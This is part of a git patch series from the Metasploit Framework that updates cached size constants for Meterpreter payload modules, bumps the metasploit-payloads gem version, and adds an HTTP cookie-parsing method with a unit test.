b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb index 792a55b199..0c74e259e5 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1281916 + CachedSize = 1281832 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb index 68cd6961ed..c6d8de8f4f 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 1060624 + CachedSize = 1060552 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb index eafc0870bb..2f19875c00 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 1060624 + CachedSize = 1060552 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb index 33dcace433..bff6d54ef5 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 1060624 + CachedSize = 1060552 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb index bc303520da..f567568271 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 1014112 + CachedSize = 1014024 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb index 1be0eb35b0..5b9d558d68 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 1014112 + CachedSize = 1014024 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb index f89b1f078f..00e989b436 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 1014112 + CachedSize = 1014024 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb index d0c7fdaa29..0cd1eeae76 100644 --- a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppce500v2_linux' module MetasploitModule - CachedSize = 1013304 + CachedSize = 1013232 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb index f29d3b36fe..be4edfe5bc 100644 --- a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppce500v2_linux' module MetasploitModule - CachedSize = 1013304 + CachedSize = 1013232 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb index d85a3d01c2..6242fb1cd2 100644 --- a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppce500v2_linux' module MetasploitModule - CachedSize = 1013304 + CachedSize = 1013232 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb index 8b5b9f83fd..d9d566b083 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 905984 + CachedSize = 905896 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb index 8dfc4aa031..46527bdcf5 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 905984 + CachedSize = 905896 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb index fc66f7ed71..3bb1faae90 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 905984 + CachedSize = 905896 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb index 88d00a81c0..e6a49d928f 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 956868 + CachedSize = 956796 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb index 402929bbbf..97a109ec52 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 956868 + CachedSize = 956796 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb index ed7b1419aa..6b520cb0f9 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 956868 + CachedSize = 956796 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb index fbb5e7daff..b039b00993 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 1071464 + CachedSize = 1071376 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb index c2455679f7..113ec05316 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 1071464 + CachedSize = 1071376 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb index b711cb5502..58f567a34d 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 1071464 + CachedSize = 1071376 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb index 82b9690de1..a31bd2152d 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule - CachedSize = 802564 + CachedSize = 802436 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb index e9a59c6758..e4d3654632 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule - CachedSize = 802564 + CachedSize = 802436 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb index c592aca520..f4fcf15cc6 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule - CachedSize = 802564 + CachedSize = 802436 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions From 24907938bbf21be130dcab47744ee71291e18d41 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 20 Dec 2017 16:47:37 -0600 Subject: [PATCH 36/37] bump payloads, various fixes --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- modules/payloads/singles/python/meterpreter_bind_tcp.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_tcp.rb | 2 +- 6 files changed, 7 insertions(+), 7 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 5e29273834..2be32345d4 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -17,7 +17,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.3.20) + metasploit-payloads (= 1.3.23) metasploit_data_models metasploit_payloads-mettle (= 0.3.3) msgpack @@ -177,7 +177,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.3.20) + metasploit-payloads (1.3.23) metasploit_data_models (2.0.15) activerecord (~> 4.2.6) activesupport (~> 4.2.6) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 028945b2b9..afcd2a516d 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.3.20' + spec.add_runtime_dependency 'metasploit-payloads', '1.3.23' # Needed for the next-generation POSIX Meterpreter spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.3.3' # Needed by msfgui and other rpc components diff --git a/modules/payloads/singles/python/meterpreter_bind_tcp.rb b/modules/payloads/singles/python/meterpreter_bind_tcp.rb index 4d4122c50f..f6a3957f28 100644 --- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 58390 + CachedSize = 58486 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb index 718834de94..86ee953197 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 58354 + CachedSize = 58450 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_https.rb b/modules/payloads/singles/python/meterpreter_reverse_https.rb index 1332079c54..8460fa21d7 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 58354 + CachedSize = 58450 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb index ed4250ec79..12a3366a94 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 58306 + CachedSize = 58402 include Msf::Payload::Single include Msf::Payload::Python From 2e62d77e3680f1146e6cc647e01464bc42d54a97 Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Wed, 20 Dec 2017 16:19:44 -0800 Subject: [PATCH 37/37] Add new method for fetching parsed cookies from an HTTP response This fixed #9332. --- lib/rex/proto/http/response.rb | 13 ++++++++++++ spec/lib/rex/proto/http/response_spec.rb | 26 +++++++++++++++++++++++- 2 files changed, 38 insertions(+), 1 deletion(-) diff --git a/lib/rex/proto/http/response.rb b/lib/rex/proto/http/response.rb index 0e0594ebc2..6a53c23126 100644 --- a/lib/rex/proto/http/response.rb +++ b/lib/rex/proto/http/response.rb @@ -1,4 +1,5 @@ # -*- coding: binary -*- +require 'cgi' require 'uri' require 'rex/proto/http' require 'nokogiri' @@ -84,6 +85,18 @@ class Response < Packet return cookies.strip end + # + # Gets cookies from the Set-Cookie header in a parsed format + # + def get_cookies_parsed + if (self.headers.include?('Set-Cookie')) + ret = CGI::Cookie::parse(self.headers['Set-Cookie']) + else + ret = {} + end + ret + end + # Returns a parsed HTML document. # Instead of using regexes to parse the HTML body, you should use this and use the Nokogiri API. diff --git a/spec/lib/rex/proto/http/response_spec.rb b/spec/lib/rex/proto/http/response_spec.rb index 4c8d178620..2fc0869dbf 100644 --- a/spec/lib/rex/proto/http/response_spec.rb +++ b/spec/lib/rex/proto/http/response_spec.rb @@ -133,6 +133,14 @@ RSpec.describe Rex::Proto::Http::Response do HEREDOC end + let (:get_cookies_spaces_and_missing_semicolon) do + <<-HEREDOC.gsub(/^ {6}/, '') + HTTP/1.1 200 OK + Set-Cookie: k1=v1; k2=v2;k3=v3 + + HEREDOC + end + let (:meta_name) do 'META_NAME' end @@ -176,7 +184,7 @@ RSpec.describe Rex::Proto::Http::Response do Computer 44.95 2000-10-01 - An in-depth look at creating applications + An in-depth look at creating applications with XML. @@ -396,6 +404,22 @@ RSpec.describe Rex::Proto::Http::Response do expect(cookies_array).to include(*expected_cookies) end + it 'parses cookies with inconsistent spacing and a missing trailing semicolons' do + resp = described_class.new() + resp.parse(self.send :get_cookies_spaces_and_missing_semicolon) + cookies = resp.get_cookies_parsed + names = cookies.keys.sort + values = [] + cookies.each do |_, parsed| + parsed.value.each do |value| + values << value + end + end + values.sort! + expect(names).to eq(%w(k1 k2 k3)) + expect(values).to eq(%w(v1 v2 v3)) + end + end end